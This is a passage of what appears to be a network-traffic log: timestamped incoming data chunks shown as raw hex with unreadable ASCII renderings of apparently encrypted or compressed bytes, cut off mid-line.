2021-11-24 14:07:32 UTC	58	IN	Data Raw: 6d 99 1a 48 72 0d a5 df 8f 5e 8f da 68 62 a2 f4 92 87 25 51 62 c0 7e 28 5b 45 53 da d6 36 8b 6f c4 bb 0f b7 64 76 06 d2 51 d0 3d 43 4a 54 6f 13 3f 2f 3a 44 51 ce 54 e3 33 67 d0 7e 34 f3 cd 3f f5 e1 71 81 f2 6d d3 4d 84 3d 07 fc 93 20 f9 f0 c2 73 27 23 d2 ca 42 04 7e 86 8c f5 ff 3f d4 98 3d 30 6a 16 b3 e7 b6 04 2e 8d 97 cb ec 58 78 32 bc 06 13 29 aa 77 8f 33 c6 97 d9 28 b1 bc 83 e8 d5 ca 24 23 cf 5f f3 5a 2b 29 1d d7 4d ed c9 7b 82 8a 44 80 db e0 ee a3 40 79 06 8d 7b f8 63 8a 24 51 f8 ce c0 3f 1c e4 90 47 39 62 bb 0f 53 b6 1f 2a 15 e4 15 19 ad 13 20 b8 30 c5 ef ba e8 9d 03 bd 74 3c 04 aa e3 eb 39 d3 7e 95 1f 1c 85 09 e0 51 40 99 7e d4 17 54 2b b2 d4 33 85 ee 24 7b 1e 14 bb ce b4 6e b5 67 e8 90 b2 53 db 46 ed d3 34 44 d0 fd 2b 6b 26 53 4d 4f ef b1 2a 1c 4f Data Ascii: mHr^hb%Qb~([ES6odvQ=CJTo?/:DQT3g~4?qmM= s'#B~?=0j.Xx2)w3($#_Z+)M{D@y{c$Q?G9bS* 0t<9~Q@~T+3${ngSF4D+k&SMO*O
2021-11-24 14:07:32 UTC	59	IN	Data Raw: ad 5e 7c 69 e3 d8 e9 e3 5a 56 0b 29 52 ff a4 73 25 d2 1a c6 4a 25 a3 8b 7c 28 c9 0d 04 3e 98 fd aa 63 40 49 2a 72 4f 9c 62 a4 ac d8 11 3c 63 79 21 7d 81 f8 39 21 97 cd 45 16 e9 84 82 7f f0 f9 5a aa 58 ad 2b 0f c9 7b 39 6b 22 51 67 47 bc 1f 3f b5 86 ff 76 85 23 81 14 46 81 24 63 79 7b 92 d3 d6 52 f0 17 3d db 4b 36 1a 1d 6d 67 c4 e6 9d 79 4b 7a 03 97 6d ed 4d bb f2 ee de 0a ba 04 ad 79 22 34 73 cd 04 50 ec e6 69 ce 39 b6 d6 1f a1 dd 92 54 99 d8 f9 8e 5e 86 46 59 ef ea 1d a7 eb dd 2b fb f5 1f 8d 64 11 df 42 b2 ad 6b 41 29 23 66 3e 54 bb 8d 77 36 42 8a 3e 6c c0 a2 fd 17 c8 a3 3d 7d 39 e3 9a 16 6f c3 e1 f4 47 c7 34 e6 1c 1f aa d9 d4 ff d6 ae 32 af 8f 16 f6 b4 53 ef a0 c1 9c 7d dc 07 78 22 4e b2 80 68 d3 25 4d 2f 98 e6 66 ee 5f 13 cc 10 87 81 99 36 0e 42 91 eb Data Ascii: ^\|iZV)Rs%J%\|(>c@I*rOb<cy!}9!EZX+{9k"QgG?v#F$cy{R=K6mgyKzmMy"4sPi9T^FY+dBkA)#f>Tw6B>l=}9oG42S}x"Nh%M/f_6B
2021-11-24 14:07:32 UTC	60	IN	Data Raw: bc ec 33 d4 de d7 d2 bf ce f0 1f e7 b3 04 44 2e 98 09 4e 83 af 7b fc ee 36 a7 b2 10 4e bc 9e e6 99 9c 1e 48 a4 ca 14 e1 4a bd a0 3d b2 3b 02 21 04 cc ae 22 02 94 cb 32 cc 51 62 24 00 23 bf b1 f8 e3 34 ae 80 a6 38 31 5a ac 1b ff c5 47 dd 3b 45 5a 5b f7 5c 9f b7 75 0f 54 74 0a bc fb 4e 5b 96 5c dd e9 7d 89 11 52 9f e6 ab 01 b2 9e 2c 2c 07 ca c4 0f 11 d4 c0 e7 31 fe c3 6c 2b 1c 5b 53 e6 65 67 69 83 f4 aa df 9e d5 f0 e3 20 f2 93 d8 37 ec e8 05 11 d2 eb 94 b8 9f b5 68 19 fc e8 6c 6a 3f 83 25 49 08 0a f4 78 9b d9 46 92 9b 1c 80 56 97 16 e8 f0 be 91 02 8a a5 fe 19 d7 88 b9 0b 74 f2 01 04 4c a2 84 c0 37 3b 25 6c eb aa 49 a1 28 75 af 2d 1f 07 8a b6 b5 df c9 02 54 b3 73 06 f1 27 33 0e 36 63 7b 41 0a e6 ae 8d db 56 97 ce d2 14 5f e2 12 b9 01 db 42 ac 7a 8e 02 27 94 Data Ascii: 3D.N{6NHJ=;!"2Qb$#481ZG;EZ[\uTtN[\}R,,1l+[Segi 7hlj?%IxFVtL7;%lI(u-Ts'36c{AV_Bz'
2021-11-24 14:07:32 UTC	61	IN	Data Raw: 01 7d e0 b9 b5 6d 8f ad 0d 3d ac 6c 2f da b2 2d 73 2a 65 56 1d 19 bf ea f3 86 91 bf 06 92 04 eb 2b 40 39 98 b5 11 2b df 99 9f 14 41 98 7a bd 4e 7f 1e 51 cb 3f d0 4d 78 56 34 3d 1f 32 fd 57 6f e8 7d c3 9a 4d f1 0b 9d dc 4b b3 d6 29 55 47 b3 46 7b d9 4e cc 30 35 c2 aa df 97 70 ea a7 14 c2 eb e7 ec 2f 82 f1 a6 20 36 45 43 1a 81 43 8e ee e0 09 15 f3 5f 85 68 49 ee e1 ea c0 04 32 9e 1e 25 9a 8b 2b de 66 e7 e4 3c 07 77 d6 b2 ad 4e 84 0b 24 cb 6c 78 45 70 a8 4e 87 6a 15 6f 86 70 1d 80 0c 9f 2b f9 c1 b1 25 a6 d2 e6 e8 2d aa 7d 1e 66 00 28 aa fa dd 80 ae de 1a 94 dd 9c 6e 04 15 5f c2 23 92 84 92 97 bc 0b 48 3f 20 65 fa bb 61 e2 f3 92 da b0 e8 63 aa 81 2b 20 a7 18 36 1c c5 aa 57 bc 7c 2f f0 b6 78 9c 92 72 ed 6c 17 f2 0d 2b 16 27 00 9c bb 37 c3 74 06 f5 34 1e 69 72 Data Ascii: }m=l/-s*eV+@9+AzNQ?MxV4=2Wo}MK)UGF{N05p/ 6ECC_hI2%+f<wN$lxEpNjop+%-}f(n_#H? eac+ 6W\|/xrl+'7t4ir
2021-11-24 14:07:32 UTC	63	IN	Data Raw: 7d ec 94 16 43 15 72 0f 53 47 d0 c4 c2 2a de e5 07 04 50 0c 09 8a 5d 5e b0 ba c8 08 23 36 d1 1d 1e 61 3a 77 4b a7 8d 67 41 86 7b 29 4f a1 63 f3 f0 91 f5 ec 73 f5 18 47 be 65 84 78 87 ad 2d 88 9d 39 99 47 5b ed 17 07 6b 15 83 91 2d 17 ef b1 89 07 7d ea 3b 98 0d ec c8 9c ad 59 11 d4 05 14 d5 be 62 1f 2e 8b a8 3b 53 e5 7a ae a8 74 8c 3b 74 e8 98 6c 4b 89 df 50 e8 fe e5 01 70 db 86 f5 cd cb 51 11 ff 97 d9 0a 27 b3 95 05 84 80 71 a2 ee 7c ce 9e c3 cd f4 8c 4c 07 cd c0 98 78 02 b9 11 31 6a 9a 9d 20 22 4d 17 1c 0e a0 a6 a1 99 b1 be ab 95 14 c9 4e b5 44 ef b7 9a 39 16 c2 8a eb dd 3f 3a 91 7a a7 eb c6 ae c3 42 26 46 0c 3a 87 44 4b 39 85 c6 29 d8 43 fd fd 75 fe 4c 53 3b 8f c2 92 78 a1 5d ef 01 ab f8 ee ab 66 41 2e 22 bd 76 2d bc 7a 89 3d c1 ad 60 ee 8d e0 73 ab 6b Data Ascii: }CrSG*P]^#6a:wKgA{)OcsGex-9G[k-};Yb.;Szt;tlKPpQ'q\|Lx1j "MND9?:zB&F:DK9)CuLS;x]fA."v-z=`sk
2021-11-24 14:07:32 UTC	64	IN	Data Raw: c7 7b 12 03 67 6b c5 9d 27 af 90 97 b8 6c 7d c5 f3 36 40 af 30 9c 6f a5 33 e8 a1 6c 42 04 c2 99 8f bd 1c 6a ee b9 bb 99 43 00 45 02 01 a6 80 42 50 50 21 a1 6a 5d 52 33 ef e3 4e ba aa 1a c7 3e 8c 9d 73 77 d7 b8 9e 29 e0 1d b7 3e dc 87 11 58 61 19 46 ea 9f ac 63 bb 55 88 aa 59 fe 58 a3 61 74 09 2d a4 0d da e5 c9 79 80 b8 2b c6 9e bb 9d cc 86 47 cb 94 99 64 af c4 1f b1 ef f8 c2 2b 62 e3 34 7f 12 42 09 0e fa 0d a3 da c8 09 cc bd 2f b4 99 f9 69 7e cf 50 cf c3 12 2a c2 27 40 b7 e9 4f 2a 03 51 53 b8 fa 2f e2 eb 84 0e f2 27 7c 8a 47 4a fc 84 2b fb 85 ef 2d d3 d4 a4 e3 b3 1a f6 75 0d eb ca 6d b2 cf 8a 2a a2 e5 6e 89 e5 db b2 44 b1 69 31 0b 14 6b ba a4 2d 63 2f 18 ec e8 ba 3f f7 2b a0 b7 68 c5 2f cd 31 5c 66 55 1c 03 92 6f bb 25 7d 38 72 82 c2 85 ae 92 de 81 49 f3 Data Ascii: {gk'l}6@0o3lBjCEBPP!j]R3N>sw)>XaFcUYXat-y+Gd+b4B/i~P'@OQS/'\|GJ+-um*nDi1k-c/?+h/1\fUo%}8rI
2021-11-24 14:07:32 UTC	65	IN	Data Raw: 02 5d f3 a5 c4 e0 0e 13 df 42 61 e4 2e 17 25 b6 28 c0 29 0f 27 77 8f cb 34 40 86 9d 6d ae 9c 16 6f 9e 94 e0 69 1f 16 1a 79 16 1b 8d 98 58 c0 f7 1f aa d9 a8 6b 7b 22 77 af 7c 6d 96 e5 05 07 1f 4c 50 42 dc 1e 78 20 4e 6f 98 e5 f5 27 4d 82 44 c5 e7 3b d1 06 40 15 90 66 c2 7b 02 9e 48 1b 27 40 39 c1 da bb f9 df 99 97 13 73 2e fa 7b 4f f4 d6 e7 39 78 cd c7 b6 e9 aa 3f 17 c0 f3 aa 52 cd 97 c5 42 8b 88 20 bc 0f 1d 97 2a e7 3b 90 a1 2b 7b 1d c2 79 93 a3 77 b9 19 d2 ca 09 e3 06 c0 dd 86 6f 1d 6a bd e2 ae 82 3d 4c 97 57 67 d0 60 ab 47 17 68 29 2e 73 a3 88 94 eb c0 6e 32 aa 6a 21 04 08 5d c4 c4 75 0f d5 9f 2c d6 d8 22 4d ea 01 e3 1b 06 40 38 1f 0b 8a 8f 35 af 6e 86 2e 46 55 8f 4b fb 6e 1f df 94 e4 bd 17 ee 58 fb a0 cf 35 6f 21 21 c0 09 bf 23 ca 9f 30 24 48 b1 a6 54 Data Ascii: ]Ba.%()'w4@moiyXk{"w\|mLPBx No'MD;@f{H'@9s.{O9x?RB *;+{ywoj=LWg`Gh).sn2j!]u,"M@85n.FUKnX5o!!#0$HT
2021-11-24 14:07:32 UTC	66	IN	Data Raw: eb 28 9d 67 75 73 c0 ef 3e 3e 1a 65 44 a8 87 26 9f 8d 34 0b 16 bf 9d 79 96 d7 c9 39 c4 fa 6f b0 de 6d e3 a2 b9 6e ac f4 db 49 d9 da 2b d4 1f 48 02 c4 d6 8b d6 88 65 d9 69 ca 8c 8e ed 2e 5a 2b ef 32 06 39 61 e6 5b c5 29 f9 f5 c5 83 19 e1 54 ab 67 df 52 40 2e 9d 2b 75 51 bb f1 38 67 1c 30 74 7a 62 92 7e d3 4f 31 fd b4 c5 91 e0 40 7b f1 e2 61 b2 14 18 64 72 e0 f5 2f 25 ad b3 7d 8e 50 8c 6a cd e1 86 b9 6d 11 63 82 b4 6d 60 4a 4e 55 03 e5 a1 f2 b8 7d 15 f2 38 56 fb a3 bf ea fb ba 02 f2 84 37 f1 eb 2f 16 d1 e4 62 38 d4 5c 5d 18 b5 1d 2d 21 1e 67 33 ae 1a 9c f5 32 78 a3 dd 29 e3 d9 d2 fd 42 39 cb 29 88 f0 48 27 52 c2 73 1a a0 64 e7 77 1b 66 8b 7b da 0c c8 b1 28 6b b1 b4 96 70 ea a6 c3 90 ed e7 ae 4f 7d 0e a6 b8 0f 1a be 4b 68 af d0 bb c7 1f 77 95 d6 52 e7 67 34 Data Ascii: (gus>>eD&4y9omnI+Hei.Z+29a[)TgR@.+uQ8g0tzb~O1@{adr/%}Pjmcm`JNU}8V7/b8\]-!g32x)B9)H'Rsdwf{(kpO}KhwRg4
2021-11-24 14:07:32 UTC	67	IN	Data Raw: 03 cb 7e 75 72 cb d8 ac bb 11 d3 d4 93 e1 34 de 7d dd d9 87 30 7a ef cb 9f 3b ed f8 38 8a 68 23 b8 78 a2 06 14 0d 87 a9 08 01 e5 43 99 0b af 34 ca f0 5d 68 68 81 8f be ce 42 be 64 7e ec e2 7e a7 62 ae 47 88 e3 6c 6a b6 82 cf aa 7d 8c 6c 5a 25 b8 26 12 12 69 f7 7a 9b db ec 7d bb 8d 11 0f 65 d6 8f 5a 02 a2 a3 76 97 3c 7f 4b a2 07 56 6b e8 22 50 06 21 06 6c 7b 75 aa 99 1f 07 8a b6 a5 05 57 44 92 b7 a6 68 49 b9 af 38 8e 42 7b 41 5c 55 73 8d 86 95 f4 df e1 72 1d 8b 51 5a 9c 91 8e 26 a1 40 8b 6a 37 c5 f4 39 0d 7d 69 25 e9 86 f4 5c b6 2e e4 63 15 ef 13 dd 73 1c ea 01 9f 7e c1 65 9e 09 52 94 ad dd b8 e0 2b a4 fc b2 2d e4 fc 28 ec f5 b9 a8 da 1e a2 4e e4 23 76 ba b3 d7 36 88 49 7f d1 a7 5a f0 4b 23 2b 23 49 ec 3f 9b 78 02 05 b6 c8 94 7f 21 12 69 b6 40 98 cd 4d 61 Data Ascii: ~ur4}0z;8h#xC4]hhBd~~bGlj}lZ%&iz}eZv<KVk"P!l{uWDhI8B{A\UsrQZ&@j79}i%\.cs~eR+-(N#v6IZK#+#I?x!i@Ma
2021-11-24 14:07:32 UTC	68	IN	Data Raw: de a4 eb 0d cd 3e 4d ee 9d 68 36 c7 71 0d ae c4 57 85 5f 86 ee 82 9f 2f fd 82 1d b3 d1 45 4b 76 1e 67 af 04 4a c0 1e 25 c4 40 48 7a f8 24 5c b6 72 7f e5 18 f9 72 e7 0f b2 63 a4 78 45 dd 7d 4d ca f5 ff 6e f4 70 da 9b ae 79 38 c5 4a 93 3d ad 23 1f 8d 58 3c b3 54 d3 12 09 aa b0 94 68 65 ca 73 c6 97 5f e6 74 14 3a 4b a9 df 0c 6c db c7 09 90 92 91 32 bf 5b 63 31 a3 09 9e 58 ea 6b 4e 0b bc 82 a3 db 1e 86 81 52 8e 74 d4 8c 32 50 6f 33 cf b6 d9 8d 90 cb 9a 6a eb db ba fe 2b a3 33 7a 0a 93 bd d1 ee 74 8e 31 59 7c fb 55 1c 37 ea db 19 de 1f b3 62 44 8d 55 28 b6 0f 51 57 22 99 59 ee db 65 28 4e 7b 1e 14 bb de dc 6c b3 a7 a0 e0 18 4c eb 4f 1d 58 61 18 e7 26 36 2c 8b d4 93 4f ef db ed d4 2e 21 63 e1 b7 f5 80 c4 5d b7 42 5f 6f 3c e8 41 d1 f9 59 51 a0 8b fd 4e 72 ba db Data Ascii: >Mh6qW_/EKvgJ%@Hz$\rrcxE}Mnpy8J=#X<Thes_t:Kl2[c1XkNRt2Po3j+3zt1Y\|U7bDU(QW"Ye(N{lLOXa&6,O.!c]B_o<AYQNr
2021-11-24 14:07:32 UTC	70	IN	Data Raw: 67 d5 8a 55 0c 45 a5 d5 00 b6 4f dc 3d f6 08 18 00 4d 42 59 0c 11 71 f6 87 6c c0 53 ec db 16 b9 9b f6 8a d4 e7 8f d0 07 f7 78 07 c6 d6 80 32 b3 e9 98 0d 87 c5 0d dc 27 e0 02 89 f7 fd d0 17 ec 76 2a b0 77 f8 25 d8 fd df 9e bc 3f a7 70 ad 99 8f 32 b5 86 e6 3d 79 c0 b4 86 af c4 fa 13 27 a3 b8 b5 7c 2f 6e ac 77 6b 2c d0 6c a0 b1 05 ea 42 8b 47 d2 29 63 9a 8b e0 95 d4 53 80 2d 5c 2b ef e1 94 d9 d3 e5 83 c2 aa 3d fd cd 56 3f 66 c5 e0 21 ab ab 2d 87 8a 71 da ff bb 27 f4 e8 df 84 95 7b 62 3f ab ff 44 da 15 17 bb aa 17 49 cd 67 95 7b 10 54 29 8b a1 38 2c 0f 9b 17 da ce 73 ad 73 e9 5a b3 6d 04 48 1b 63 0f 31 e5 87 df b1 55 15 38 e9 5f 4e 80 ea 5c 6e 56 72 46 bf ea 12 41 9f 36 83 79 fb ba e9 05 b9 97 da ad 96 df 99 91 be c0 84 73 6c 49 82 5b 15 b0 57 47 c3 66 17 33 Data Ascii: gUEO=MBYqlSx2'v*w%?p2=y'\|/nwk,lBG)cS-\+=V?f!-q'{b?DIg{T)8,ssZmHc1U8_N\nVrFA6yslI[WGf3
2021-11-24 14:07:32 UTC	71	IN	Data Raw: 4f af e1 66 1c bb 31 cb f6 fb 1c 0d 51 96 44 ec ca 3d be b2 d0 82 11 76 5f ca 9e fb 9e c6 cc 61 66 1c 46 fe 79 a9 63 e1 34 03 5d 03 fe 6a 61 1b 79 d7 cf 71 50 cb 33 f0 b8 e6 81 73 10 9a 71 ec 23 5c 51 74 9b 31 68 c9 22 56 02 bb fe a3 1c 22 08 cf fc 79 72 20 56 9c e2 52 93 e5 57 1c 99 23 6e d5 d0 52 77 80 dd a4 8e ac 36 e2 a2 46 6e ae be 91 61 fd c4 86 8f ba be ed ed 50 9f 8e 66 98 f0 60 4b 11 0f fc 6a 3f f7 78 75 5f eb 98 3f 40 b6 3b aa 9b 1c 53 1f 30 14 e4 7d 38 1f 63 4d e0 52 9f db c3 b1 0d 25 b8 d2 2c 2c d7 ed f6 a1 28 1a 29 fb 53 b7 3d 28 1e 55 3f 75 06 63 68 fb b2 e5 cd 52 ec a6 d0 1c f9 34 62 bb cf 3c 29 54 0e f8 39 88 be 5c a0 25 d8 a5 a7 51 72 84 99 f4 18 55 cc d6 4f a4 35 78 01 3d a9 8e 09 7c 24 77 e5 6a 2e 6d a6 23 77 91 79 06 a6 f0 77 25 1e 0d Data Ascii: Of1QD=v_afFyc4]jayqP3sq#\Qt1h"V"yr VRW#nRw6FnaPf`Kj?xu_?@;S0}8cMR%,,()S=(U?uchR4b<)T9\%QrUO5x=\|$wj.m#wyw%
2021-11-24 14:07:32 UTC	72	IN	Data Raw: 91 43 2d 67 ec 60 e7 d0 5f 14 0b c7 5f d1 66 59 17 c3 2e 71 58 22 45 bc 9e 78 48 d7 c5 a6 ef 41 32 04 52 37 ae 6d 24 46 48 9a 76 fe 9a 73 bb c2 ce 60 24 b3 bb a1 47 2c 8a 6f 97 07 a3 1e 32 8b 6b a9 22 1b 3d 4d 37 3f 52 b9 82 f1 7c 46 74 ee 42 1a 89 04 da e6 2f 3a 44 51 c6 54 e3 3f a7 3d 68 f8 04 47 d0 f5 22 e1 98 a0 3b 6a 74 b4 1b bd 77 d6 5b 6d 10 61 ff d3 23 2d f6 31 d9 3b 07 09 5d e7 6e 86 20 e2 0c e9 d2 3c 27 8a 21 46 e6 2f 1b cc 2b e2 7b dd 0e 42 a2 ef 7b 5c f5 b3 9b 97 93 bc 48 64 48 47 b7 a6 96 65 2b f4 cc 4a 44 a9 86 c6 f6 f6 36 bf e4 15 0d 9e 5c 33 78 f3 d1 11 d6 d0 61 15 84 92 b2 84 f5 30 9b 20 6f d5 dc 1c 9a 2e 52 91 46 94 67 06 a9 01 d5 3a 70 1f 43 a9 10 85 52 a3 35 13 b2 99 f0 f8 55 1c 39 e2 00 45 31 6b a9 55 87 cd e1 af b1 09 38 96 33 56 a7 Data Ascii: C-g`__fY.qX"ExHA2R7m$FHvs`$G,o2k"=M7?R\|FtB/:DQT?=hG";jtw[ma#-1;]n <'!F/+{B{\HdHGe+JD6\3xa0 o.RFg:pCR5U9E1kU83V
2021-11-24 14:07:32 UTC	74	IN	Data Raw: a9 56 85 6a 53 b8 46 0c 90 90 c3 4e 68 11 2b b9 2d e3 be b6 b0 39 f8 b0 98 8f e3 fd 8e ce f7 84 cb 9e e8 a6 c4 fa 35 0d 96 91 a3 2f 27 86 2a 8a 75 04 4c 6a b0 b0 3b 26 9a c8 1d 43 7a b3 bf 12 97 dc bd 0a b2 4d f3 83 23 2b a0 06 11 e1 26 5b 27 37 c0 c4 1b 49 55 02 3c 6c 21 46 18 17 bd fe f7 4c d6 e7 f3 45 59 f1 79 07 1d e7 80 32 b3 e9 dc d7 ff bd 1f 57 aa da 76 93 55 6d 1e c3 83 99 cd ef 2c 73 c0 46 bc 69 17 d4 10 c6 cb 39 ca 13 37 68 82 67 71 6d c4 3f 0b 91 6c 36 2c 1c 0c ed 5d ce e2 e3 21 1a 54 cb 70 63 9d b3 65 5b 7a ff 2d 5e 8c 32 65 d9 94 b5 d4 b2 04 1b a9 59 85 5d 39 ce 1d 0a b0 0b 7f 3e b0 6a 2a 64 cd 20 7a a7 dc 04 49 78 75 49 cc 42 66 72 dc 63 8d 9d 98 ab 9d 3b fd 71 c2 2a e1 ff 3c ce e0 e9 18 41 12 c9 a5 1c 6c 6c f7 9c 6e 7a 13 3b 0b af f2 43 88 Data Ascii: VjSFNh+-95/'uLj;&CzM#+&['7IU<l!FLEYy2WvUm,sFi97hgqm?l6,]!Tpce[z-^2eY]9>jd zIxuIBfrc;q*<Allnz;C
2021-11-24 14:07:32 UTC	75	IN	Data Raw: 32 6c 42 00 c2 1f aa bd 1c 0f c6 29 27 7e 7b 76 25 4a e0 1e 08 83 45 a4 cd e4 e1 d4 d0 9a ce c9 be 45 ef 29 0b d7 11 14 44 8b 9b 7b 8e 5b e0 10 e7 74 17 a7 17 58 61 48 08 ea c3 25 26 07 dc 0a 2f 38 a8 9d 2a 24 54 97 0d 68 84 14 cd c3 f8 74 b4 91 6a 0e 94 25 0a 14 da 91 f4 7a 32 47 24 e1 33 04 2b d5 4e 81 ba cb fc d6 1e 88 fc 28 d6 70 c2 6a 35 00 9d 50 cb 91 a6 d1 a2 83 62 8a 94 2c d9 09 72 cb 5b e3 35 26 0b 51 53 84 ab 91 af e3 7d f3 0d 76 7e ef 14 18 01 7b 5f 2c e7 6c a8 2b 43 5b 4b 0b 38 0d d8 0d 68 83 2c fa 73 89 9c 09 6e 9e 89 15 dc 3d bb be 6e 29 17 99 3f 3b 59 f7 66 e2 30 b3 3d 82 a1 5c 2b 23 83 f6 e1 25 cd 31 de e6 d9 9f c7 96 d7 94 70 d5 38 49 8e 04 a1 a4 92 d1 54 1c 73 8e 7f 97 b2 4b c8 90 1f f2 35 1f d6 ec f8 0a fd 7e 14 17 3f 15 07 09 9a 4a 6e Data Ascii: 2lB)'~{v%JEE)D{[tXaH%&/8*$Thtj%z2G$3+N(pj5Pb,r[5&QS}v~{_,l+C[K8h,sn=n)?;Yf0=\+#%1p8ITsK5~?Jn
2021-11-24 14:07:32 UTC	76	IN	Data Raw: 84 cd e4 78 1a b5 98 ea 9e bd 7f e1 e9 6c b5 9b 8b b3 68 23 0a 7e 9a b3 a4 ef 04 d3 a7 6c 51 8c 16 84 60 19 f9 b6 e4 33 44 31 14 84 df b1 3f fd c4 8b da b2 f6 58 b3 3f 33 9c f7 41 15 87 2c 45 93 b9 e4 04 14 ac 84 21 12 f2 c8 af 34 98 1c eb cb ab 63 6e f2 2a 7b a0 dd 3d 3b 24 be 44 24 1b 61 3e 7e 25 20 31 4a 22 9a 1c 77 8e 02 8a 57 94 05 f9 ef f3 a1 c4 bf f2 04 e3 85 a3 97 ff 9e 98 a6 d1 e2 6f c0 38 71 06 f1 8d 75 81 af 82 57 c1 64 2a 87 8d 69 8d 3b c7 95 53 11 2c cf 2b 5a eb c0 87 4c ec 78 a3 0d 40 a1 3b 3b a7 22 0d 07 78 52 5e a8 18 e2 01 59 17 59 88 3e f3 2a 8a 8f be f2 7e d5 fd 98 92 94 e9 c7 f2 20 55 12 65 06 f7 c0 a1 04 09 1b 7a 06 ac 6a 02 fb 39 d8 ee 0a c6 50 6f 23 43 d3 d8 b7 67 9a d4 1e db c7 09 46 89 c6 5e a7 78 b1 b3 c0 80 d1 b0 63 2f a2 82 f9 Data Ascii: xlh#~lQ`3D1?X?3A,E!4cn{=;$D$a>~% 1J"wWo8quWdi;S,+ZLx@;;"xR^YY>*~ Uezj9Po#CgF^xc/
2021-11-24 14:07:32 UTC	77	IN	Data Raw: ae 92 d1 5b 7f 16 78 bc a4 18 23 a4 86 92 67 3d 6f a4 69 57 f6 c2 79 fb 18 b2 67 fa f6 8d 45 ff 96 77 52 86 29 e5 14 4a f0 66 5e 43 6b 41 5c 64 f8 3e 33 27 8a 0a da a4 52 47 5b 30 18 11 cb 2a 17 49 77 20 f8 86 52 4d 9d 2c 23 5b d1 c8 f4 63 3f 6b 23 6a bb 35 5d dd 40 6a 50 2d e9 b2 53 14 56 76 fe d1 72 64 dd 6d 6e 5c 27 22 c0 20 b1 ed 37 d7 4e 21 9f b5 f9 88 bc a6 0e da 3a 92 92 0e 99 15 d5 a0 09 5c ce 93 a2 66 76 80 27 e0 da 62 ff 5d 0c 7b a8 38 f0 b5 78 5a 9a cd bf 8c 9f 3e 2c 43 19 fd 04 2d 5a d1 10 4f 7a 52 64 56 ea 91 48 65 c1 d9 12 68 84 3a 33 88 e2 81 87 b9 b9 30 6a 4f 73 a1 85 f9 11 83 84 c2 78 8f e1 da 51 31 e3 1a e6 5a 3c 50 5e 0b b3 3b 63 65 21 64 29 18 2e d7 00 cf 86 68 71 6b 4b 8b 4e 85 70 c4 e8 b6 e9 bd f9 03 1e 5a 2c a5 d8 ed db 31 2b ef 32 Data Ascii: [x#g=oiWygEwR)Jf^CkA\d>3'RG[0*Iw RM,#[c?k#j5]@jP-SVvrdmn\'" 7N!:\fv'b]{8xZ>,C-ZOzRdVHeh:30jOsxQ1Z<P^;ce!d).hqkKNpZ,1+2
2021-11-24 14:07:32 UTC	79	IN	Data Raw: 93 db f6 b1 f4 6c d4 0e 62 11 9c 17 8d 90 82 64 c7 4e 73 71 7c 63 39 ab 47 9e 58 63 26 a2 82 70 0f de 13 ba 0d a2 21 0f b2 e8 66 94 61 59 b9 b9 f9 98 ef ba 84 ce d2 9b 70 45 96 0b 33 52 12 3f a0 6f 34 a3 25 d7 36 8a 38 0c aa e3 55 75 5b 85 6e e0 4c 5a 83 45 d0 a5 e4 88 d4 9e 9a b0 2f fb e9 66 ab 90 f2 31 f6 50 02 19 d8 f9 67 68 48 e7 c1 52 d4 58 d4 0d 48 bb af bc e9 f3 b2 55 4f ef 38 a8 cd 2a 24 04 97 0d 38 ca 14 a5 1f bd d3 3d 13 f7 3b b4 f9 41 51 0d db b0 f1 32 4e 24 0c c7 55 6a a3 04 c3 95 8e 36 b0 c7 a7 27 62 16 88 6f 95 ab 50 0c fd 01 d7 a6 a2 21 80 37 a7 6e 23 55 da 14 42 16 c4 2a 67 af d8 16 5c cb 95 67 35 45 8a fa 2d 2c 07 ce b0 01 7b 3c 28 7a 66 a8 a0 a7 5f 16 5b d0 48 73 80 2d de 31 0b ca 21 b3 a2 6e 15 84 9f d2 37 bb d4 ed 60 5e 9c 39 6b b3 2b Data Ascii: lbdNsq\|c9GXc&p!faYpE3R?o4%68Uu[nLZE/f1PghHRXHUO8$8=;AQ2N$Uj6'boP!7n#UBg\g5E-,{<(zf_[Hs-1!n7`^9k+
2021-11-24 14:07:32 UTC	80	IN	Data Raw: 20 c2 da 92 85 09 a3 5e 8f 58 fb 69 b6 3e 86 e8 a6 93 d6 9c 0d 51 ba 80 9b b2 05 1b a1 87 46 38 85 35 0a 39 a6 c2 29 91 c7 dc 28 2c 87 20 d7 e2 73 70 c0 3f 7d 66 c7 8b 44 72 7f a7 1a b0 f4 95 66 dc 97 17 21 67 46 41 b1 29 13 fe ab 19 1e 9e 25 d9 3e 90 6a 75 aa 30 10 a8 0d ab 30 bf 9b cc 2c e5 05 6d 76 92 24 96 39 5d bb 4a 4e 6f d3 2d ef da 5a 5c 80 a3 6e 33 44 3b d5 ec 29 96 a4 db 02 13 76 be ef 12 6f 7f ae 44 d4 20 12 c4 68 84 aa f6 e5 ae f9 49 15 b0 3d b0 0b fb 79 81 e6 ba 1a 5a ae 6d cd 70 48 f0 76 24 89 67 05 6f c6 ed c8 e4 7e 2c 06 84 25 78 f7 bd f2 97 fe c6 51 a7 27 1c 90 3f bb e7 f4 65 82 f1 a0 3b c2 a8 bd e5 68 85 d0 05 4f 9a c7 95 5b 54 63 b4 4e a4 bb 96 ec 71 43 87 53 02 08 23 ff 03 a1 87 32 83 f6 d6 d8 a9 70 98 0b 57 66 33 87 d0 8f 78 dc 67 b3 Data Ascii: ^Xi>QF859)(, sp?}fDrf!gFA)%>ju00,mv$9]JNo-Z\n3D;)voD hI=yZmpHv$go~,%xQ'?e;hO[TcNqCS#2pWf3xg
2021-11-24 14:07:32 UTC	81	IN	Data Raw: b1 3a 1c 29 d0 e5 30 91 0d 0e 3d 5a e5 24 8a ed 6e ee 02 5c 9d 93 de be 9f ed cc 51 c3 5a 5b 85 eb 60 d5 4f 3f 6a 4b f7 ec 66 b8 01 e5 4d cd f6 16 56 f7 1c 66 92 40 39 54 21 38 05 05 4d e0 12 fd d1 62 f4 34 60 bf fe d8 25 a2 43 d7 a3 4d e2 6d 13 6d 4c f5 49 9d e5 37 d8 42 c5 13 ad 5a 09 9f 49 7c 2d 8d 7e 7a 7d 33 b6 11 2d a9 b3 9d f8 68 58 92 3c 89 a7 37 96 12 ca dc 94 70 de 7c c5 61 e9 3c cb 46 8f 02 68 f4 20 1d 17 1e ef 2b 53 73 27 bc 46 ff d4 98 8f bd 9e 1b 3d 34 19 4c 3c f8 fd 78 2e 31 88 5e ae 0a 27 96 aa 6f b1 89 04 9e 5b 59 53 68 85 44 65 d6 2d f3 f6 2a be c2 23 db d5 a0 75 5c ce f1 a2 66 14 80 27 82 da 62 9d 5d 0c 77 a8 38 e4 b5 78 46 75 01 00 04 93 8d dd ad d3 70 81 55 2c 68 e7 9c b1 82 47 0e 22 63 de 57 37 6a 5f 27 c9 0d 27 62 a6 eb e8 eb f3 33 